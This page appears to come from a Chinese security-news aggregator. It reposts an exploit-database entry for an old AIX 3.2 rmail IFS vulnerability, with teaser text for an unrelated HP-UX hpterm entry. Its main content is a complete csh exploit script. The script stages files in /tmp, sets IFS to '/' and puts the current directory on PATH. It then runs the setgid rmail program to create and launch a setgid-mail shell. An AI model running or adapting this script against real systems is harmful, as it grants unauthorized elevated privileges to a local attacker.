HP-UX hpterm获取额外权限漏洞 漏洞ID 1207699 漏洞类型 未知 发布时间 1994-06-01 更新时间 1994-06-01 CVE编号 CVE-1999-0423 CNNVD-ID CNNVD-199406-001 漏洞平台 N/A C…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
聚合网络安全,存储安全技术文章,融合安全最新讯息
漏洞ID | 1053337 | 漏洞类型 | |
发布时间 | 1994-04-02 | 更新时间 | 1994-04-02 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | AIX | CVSS评分 | N/A |
#source: http://www.securityfocus.com/bid/454/info
#
#Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs.
#
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994
# Setup needed files.
mkdir /tmp/.rmail
cd /tmp/.rmail
cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail [email protected]
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh
HP-UX hpterm获取额外权限漏洞 漏洞ID 1207699 漏洞类型 未知 发布时间 1994-06-01 更新时间 1994-06-01 CVE编号 CVE-1999-0423 CNNVD-ID CNNVD-199406-001 漏洞平台 N/A C…
评论